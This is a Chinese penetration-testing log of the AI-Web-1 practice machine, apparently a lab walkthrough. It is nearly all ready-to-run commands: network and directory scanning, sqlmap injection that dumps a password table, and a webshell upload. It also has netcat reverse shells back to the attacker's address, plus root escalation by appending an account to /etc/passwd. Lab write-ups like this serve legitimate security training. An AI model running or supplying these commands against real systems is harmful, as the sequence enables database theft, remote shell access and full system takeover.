netdiscover #扫描当前网段主机
nmap -sS -sV -A -n 192.168.10.105 #扫描主机(192.168.10.105)的端口开发情况等详细信息
dirb http://192.168.10.105 #扫描网站目录
dirb http://192.168.10.105/m3diNf0/
http://192.168.10.105/m3diNf0/info.php #发现后台php信息页面,访问获取网站访问根目录/home/www/html/web1x443290o2sdf92213
dirb http://192.168.10.105/se3reTdir777
#发现http://192.168.10.105/se3reTdir777/index.php存在SQL注入,进行注入测试
sqlmap -u http://192.168.10.105/se3reTdir777/index.php --data="uid=1&Operation=Submit" -D aiweb1 -T systemUser -C id,userName,password --dumps
#systemUser表信息,没有发现登录页面,信息无用。
+----+-----------+----------------------------------------------+
| id | userName | password |
+----+-----------+----------------------------------------------+
| 1 | t00r | RmFrZVVzZXJQYXNzdzByZA== |
| 2 | aiweb1pwn | TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZjBzYQ== |
| 3 | u3er | TjB0VGhpczBuZUFsczA= |
+----+-----------+----------------------------------------------+
#sqlmap获取shell
sqlmap -u "http://192.168.10.105/se3reTdir777/" --data "uid=1&Operation=Submit" --level=3 --os-shell #
#文件上传目录
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
#使用sqlmap,上传木马
sqlmap -u "http://192.168.10.105/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write /home/kali/Desktop/mywork/b.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/b.php
#使用蚁剑连接木马
http://192.168.10.105/se3reTdir777/uploads/hack.php
#kali开启6666端口监听
nc -lvvp 6666
#目标主机尝试连接kali,ubuntu版本删除了-e参数,没有回弹
nc -e /bin/bash 192.168.10.106 6666
#kali主机nc回弹,获取shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.10.106 6666 >/tmp/f
#更改终端样式
python -c "import pty;pty.spawn('/bin/bash')"
#查询sudo权限文件
find / -user root -perm -4000 -print 2>/dev/null
#查询目标主机内核版本
uname -a
Linux aiweb1 4.15.0-58-generic
#搜索是否存在内核漏洞
searchsploit linux kernel 4.15.0
#当前内核另一种漏洞,创建hacker账号
openssl passwd -1 -salt hacker 123456
#将hacker信息写入/root权限中,获取root,提权成功
echo 'hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0::/root:/bin/bash' >> /etc/passwd
AiWeb渗透记录
最新推荐文章于 2024-06-29 21:27:33 发布
本文介绍了使用netdiscover扫描网段,Nmap进行主机和端口扫描,Dirb探测网站目录,发现并利用SQL注入获取shell,以及进行文件上传和提权的过程。展示了黑客如何逐步渗透和控制目标系统。
摘要由CSDN通过智能技术生成